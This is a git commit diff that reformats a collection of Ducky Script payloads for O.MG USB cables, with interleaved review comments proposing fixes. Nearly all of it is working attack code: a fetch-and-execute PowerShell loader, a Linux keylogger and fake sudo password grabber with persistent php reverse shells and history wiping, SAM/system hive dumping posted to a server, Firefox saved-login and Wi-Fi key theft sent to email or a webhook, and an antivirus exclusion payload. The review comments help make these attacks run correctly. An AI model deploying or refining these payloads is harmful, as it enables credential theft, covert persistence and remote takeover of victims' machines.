Fixing misc execution or formatting errors

There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices).

Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability.

No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.
syntaxFixes
kalanihelekunihi 2023-06-05 12:29:42 -04:00
parent 63ce12dd61
commit 4a0fdf22c3
32 changed files with 679 additions and 1249 deletions

View File

@ -1,15 +1,18 @@
REM Title: Credz-Plz
REM_BLOCK
Title: Credz-Plz
Author: I am Jakoby
Target: Windows 10, 11
REM Author: I am Jakoby
Description: This payload is meant to prompt the target to enter their creds to later be ted with dropbox. See README.md file for more details.
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
REM Target: Windows 10, 11
DEFINE #URL
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://#URL?dl=1; invoke-expression $pl
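Review bot: `DEFINE #URL` has no value, so this script fails to compile before the user has edited anything, which is exactly the class of error the commit sets out to fix; the other payloads in the commit give the define a placeholder (`DEFINE #URL <Your Shared link for the intended file>` in Shortcut-Jacker and Play-WAV), so do the same here and point the "Remember to replace the link" sentence at that DEFINE line rather than at the STRINGLN. The new description also lost a word: "to later be ted with dropbox" should read "exfiltrated", as in the line it replaces. Last, `https://#URL?dl=1` prepends the scheme while Shortcut-Jacker's `#URL?dl=1` expects the define to carry it; pick one convention for the whole commit so a user who pastes a full Dropbox link into the define does not end up with `https://https://`.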

View File

@ -1,192 +1,92 @@
REM Title: Harvester_OF_SORROW
REM Author: LulzAnarchyAnon
REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a
REM pin, or password is required to export saved log in credentials.
REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes
REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot
REM to an email of your choosing.
REM Target: Windows 10, PowerShell & Mozilla Firefox
REM_BLOCK
Title: Harvester_OF_SORROW
Author: LulzAnarchyAnon
Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a pin, or password is required to export saved log in credentials.
The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.
Target: Windows 10, PowerShell & Mozilla Firefox
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
REM Version: 1.0
REM Category: Credentials (OMG)
Version: 1.0
Category: Credentials (OMG)
REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from
REM the email screen shot.
Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from the email screen shot.
You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
Can exfil more than 5, but I chose 5 to keep file sizes low.
Can exfil from directory other than screenshots by changing path.
You might have to adjust the delays, depending on the target machine, but these worked ok for me.
Use responsibly, and within the confines of the law.
END_REM
DEFINE #USER_EMAIL user@example.com
DEFINE #USER_PASSWORD supersecretpassword
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 200
GUI r
DELAY 200
STRING firefox about:logins
ENTER
STRINGLN firefox about:logins
DELAY 1000
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
TAB
REPEAT 10 TAB
DELAY 1000
SHIFT SPACE
DELAY 5000
PRINTSCREEN
DELAY 5000
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
STRINGLN powershell -windowstyle hidden
DELAY 2000
STRING mspaint
ENTER
STRINGLN mspaint
DELAY 5000
CTRL v
DELAY 2000
CTRL s
TAB
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 100
REPEAT 11 TAB
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
RIGHTARROW
DELAY 100
RIGHTARROW
DELAY 200
REPEAT 2 RIGHTARROW
TAB
DELAY 200
ENTER
CTRL RIGHTARROW
DELAY 100
CTRL RIGHTARROW
DELAY 100
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
REPEAT 2 CTRL RIGHTARROW
REPEAT 13 TAB
REPEAT 2 RIGHTARROW
ENTER
TAB
ENTER
DELAY 1000
ALT f
DELAY 50
ALT X
DELAY 50
ALT f
DELAY 50
X
DELAY 2000
REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.
DELAY 2000
GUI r
DELAY 200
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
STRING %USERPROFILE%\Pictures\Screenshots
ENTER
DELAY 150
STRINGLN %USERPROFILE%\Pictures\Screenshots
REM sorting the files by date
MENU
DELAY 150
SHIFT F10
STRING o
DELAY 150
DOWNARROW
DELAY 150
ENTER
DELAY 150
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
DELAY 150
REPEAT 4 SHIFT RIGHTARROW
REM sending files to loot.zip
MENU
DELAY 150
SHIFT F10
STRING n
DELAY 200
DOWNARROW
DELAY 150
ENTER
DELAY 500
STRING loot
ENTER
DELAY 150
STRINGLN loot
ALT F4
DELAY 150
GUI r
DELAY 150
REM open powershell and send the email
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force))
ENTER
STRINGLN Send-MailMessage -From #USER_EMAIL -To #USER_EMAIL -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #USER_EMAIL, (ConvertTo-SecureString -String "#USER_PASSWORD" -AsPlainText -Force))
DELAY 500
REM cleanup
STRING del Pictures\Screenshots\loot.zip
ENTER
DELAY 150
STRING exit
ENTER
STRINGLN del Pictures\Screenshots\loot.zip
STRINGLN exit
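Review bot: the REM_BLOCK still says "You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials" without saying that the values now live in `DEFINE #USER_EMAIL user@example.com` / `DEFINE #USER_PASSWORD supersecretpassword`; since the commit moves the edit point from the Send-MailMessage line to those two DEFINE lines, the block should name them, and the defaults are better written as obvious placeholders than as a syntactically valid address that will be used as-is if the user forgets. Dropping "on lines 18, 57, and 61" from the path comment was the right call, since the line numbers no longer hold after the DELAY/REPEAT collapse. The typos "ajusted" and "aqusition" carried over into the new block. Also confirm on hardware that `REPEAT 10 TAB`, `REPEAT 11 TAB` and `REPEAT 2 CTRL RIGHTARROW` are the firmware's accepted form (count and command on one line) rather than the Hak5 form where REPEAT repeats the previous line; the commit message itself notes that some commands do not exist on O.MG devices, so this is the kind of thing to verify once before merging.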

View File

@ -1,93 +1,75 @@
REM Title: DuckyLogger
REM Description: Key logger which sends each and every key stroke of target remotely/locally.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM_BLOCK
Title: DuckyLogger
Description: Key logger which sends each and every key stroke of target remotely/locally.
AUTHOR: drapl0n
Version: 1.0
Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
END_REM
DUCKY_LANG US
REM [keeping tracks clear]
DELAY 5000
CTRL ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
DELAY 100
REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system
ENTER
STRINGLN mkdir /var/tmp/.system
DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
STRINGLN chmod +x /var/tmp/.system/sys
DELAY 100
REM [importing xinput]
STRING cd /var/tmp/.system/
ENTER
STRINGLN cd /var/tmp/.system/
DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
STRINGLN wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
DELAY 5000
STRING chmod +x xinput
ENTER
STRINGLN chmod +x xinput
DELAY 100
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
STRINGLN chmod +x /var/tmp/.system/systemBus
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
STRINGLN mkdir -p ~/.config/systemd/user
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
STRINGLN chmod +x /var/tmp/.system/reboot
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
STRINGLN systemctl --user daemon-reload
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
STRINGLN systemctl --user enable --now systemBUS.service
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
STRINGLN systemctl --user start --now systemBUS.service
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
STRINGLN systemctl --user enable --now reboot.service
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
STRINGLN systemctl --user start --now reboot.service
DELAY 100
REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
STRINGLN echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
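Review bot: the STRING/ENTER to STRINGLN rewrite is mechanical and keeps each command intact, but two carry-overs should be fixed while these lines are being touched. `REM [creating systemd service to execute payload on boot]` appears twice, once before the systemBUS.service unit and again before reboot.service; the second should read `REM [creating systemd service for reboot]` as the sudoSnatch file already does. And `STRINGLN systemctl --user start --now systemBUS.service` / `STRINGLN systemctl --user start --now reboot.service` are both redundant and malformed: `--now` is only accepted with enable, disable and mask, and the preceding `enable --now` line has already started the unit, so those two lines can simply go. Minor: "incase", "listner" and "targets" in the inline comments, and unlike SamDumpCable this file keeps its `0.0.0.0` literals inline instead of in a DEFINE, which breaks the pattern the commit introduces elsewhere.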

View File

@ -1,33 +1,24 @@
REM Title: SamDumpCable
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
REM Author: 0iphor13
REM Version: 1.0
REM Category: Credentials
REM Requirements: OMG Firmware v.2.5 or higher
REM_BLOCK
Title: SamDumpCable
Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
Author: 0iphor13
Version: 1.0
Category: Credentials
Requirements: OMG Firmware v.2.5 or higher
END_REM
DEFINE #IPADDRESS 0.0.0.0
DELAY 1000
DUCKY_LANG de
DELAY 500
DELAY 1500
DELAY 2000
DEFAULT_DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
ALT j
DELAY 250
STRING powershell.exe -NoP -enc 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
DELAY 200
ENTER
DELAY 200
STRINGLN powershell.exe -NoP -enc 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
REM Insert your recieving servers IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER
STRINGLN iwr "http://#IPADDRESS" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
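Review bot: the encoded argument to `powershell.exe -NoP -enc` is not visible in the rendered diff, so the only reviewable change on that line is STRING/ENTER to STRINGLN; the REM_BLOCK should at least state what the encoded script does so the next reviewer is not forced to decode it. Other points: `REM Change this Change this shortcut depending on the systems language (engl.: ALT y)` repeats a phrase and "systems" wants an apostrophe; `REM Insert your recieving servers IP here` should now point at `DEFINE #IPADDRESS 0.0.0.0` rather than at the line beneath it, and "recieving" is misspelled; and the stacked `DELAY 1000` / `DELAY 500` / `DELAY 1500` / `DELAY 2000` lines ahead of `DEFAULT_DELAY 500` read like a merge leftover rather than intent.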

View File

@ -1,82 +1,51 @@
REM Title: sudoSnatch
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM_BLOCK
Title: sudoSnatch
Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
AUTHOR: drapl0n
Version: 1.0
Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 100
REM [keeping tracks clear]
DELAY 5000
CTRL ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
REM [creating password grabbing mechanism]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRING touch /var/tmp/.system/sysLog
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRINGLN mkdir /var/tmp/.system
STRINGLN echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
STRINGLN touch /var/tmp/.system/sysLog
STRINGLN chmod +x /var/tmp/.system/systemMgr
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
STRINGLN chmod +x /var/tmp/.system/systemBus
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
STRINGLN mkdir -p ~/.config/systemd/user
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
STRINGLN chmod +x /var/tmp/.system/reboot
REM [creating systemd service for reboot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
REM [enabling services]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
STRINGLN systemctl --user daemon-reload
STRINGLN systemctl --user enable --now systemBUS.service
STRINGLN systemctl --user start --now systemBUS.service
STRINGLN systemctl --user enable --now reboot.service
STRINGLN systemctl --user start --now reboot.service
REM [autostarting service on terminal/shell launch]
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
STRINGLN echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
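Review bot: `DEFAULT_DELAY 100` correctly stands in for the `DELAY 100` that followed most commands, but it also now governs the lines that previously had `DELAY 200`, `DELAY 300` and `DELAY 150` (the `mkdir -p ~/.config/systemd/user` line and the systemctl block), so this is a small timing change rather than a pure syntax fix and deserves a word in the commit message. The same `systemctl --user start --now ...` problem as in DuckyLogger applies here: `--now` is only valid with enable, disable and mask, and the enable line has already started the unit, so the two start lines are dead weight. In the REM_BLOCK the description ends with ".." and has "imediately"; "incase" and "listner" survive in the inline comments.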

View File

@ -1,27 +1,24 @@
REM I took my own code and found the other version already made. I combined them to make it better
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
REM this is designed for the omg cable instead of the tiny.
REM_BLOCK
DESCRIPTION:
I took my own code and found the other version already made. I combined them to make it better.
This is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
This is designed for the omg cable instead of the tiny.
END_REM
DEFINE #WEBHOOKADDR <ADD-WEBHOOK-ADDRESS-HERE>
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
Delay 3000
STRING GUI r
Delay 100
String cmd /k mode con: cols=15 lines=1
Enter
Delay 500
String cd %temp%
Enter
Delay 500
String netsh wlan export profile key=clear
Enter
Delay 1000
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
STRINGLN cmd /k mode con: cols=15 lines=1
STRINGLN cd %temp%
STRINGLN netsh wlan export profile key=clear
STRINGLN powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
DELAY 3000
STRINGLN powershell Invoke-WebRequest -Uri https://webhook.site/#WEBHOOKADDR -Method POST -InFile Wi-Fi-PASS
Delay 3000
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS
Enter
Delay 3000
String del Wi* /s /f /q
Enter
Delay 1000
Exit
STRINGLN del Wi* /s /f /q
STRINGLN exit
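Review bot: the old `STRING GUI r` (which typed the literal text "GUI r") was removed but not replaced with an actual `GUI r`, so the new script begins with `STRINGLN cmd /k mode con: cols=15 lines=1` without ever opening the Run dialog; restore the keystroke ahead of the first STRINGLN, the same way every other payload in this commit does. The REM_BLOCK has only a DESCRIPTION and no Title, Author or Target lines, unlike the rest of the commit. Turning the old bare `Exit` into `STRINGLN exit` is correct.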

View File

@ -1,16 +0,0 @@
REM Title: Play-WAV
REM Author: I am Jakoby
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
DELAY 500
ENTER
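Review bot: this hunk deletes the whole Play-WAV payload and the next hunk adds it back with the REM_BLOCK header; if the file was renamed, stage it with `git mv` so the rename is tracked and the diff shows only the header change instead of a delete-plus-create.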

View File

@ -0,0 +1,19 @@
REM_BLOCK
Title: Play-WAV
Author: I am Jakoby
Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more
Target: Windows 10, 11
Remeber to replace the link with your link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -Exec Bypass iwr https://#URL?dl=1 -O $env:TMP\e.wav
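Review bot: the new description is truncated to "See Play-WAV.ps1 for more" where the deleted file read "for more details"; restore the missing word. "Remeber" carries over from the old header. As in Credz-Plz, `https://#URL?dl=1` combined with the placeholder `<Your Shared link for the intended file>` will double the scheme if the user pastes a full link into the DEFINE; either drop `https://` from the STRINGLN (Shortcut-Jacker's form) or say in the block that the define takes host and path only.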

View File

@ -1,25 +1,20 @@
REM Title: Safe-Haven
REM_BLOCK
Title: Safe-Haven
Author: I am Jakoby
REM Author: I am Jakoby
Description: This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
REM Description: This is a UAC bypass payload that will open an elevated powershell console
REM Next a Directory called "safe" will be generated in your Documents Directory
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
Target: Windows 10, 11
END_REM
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1000
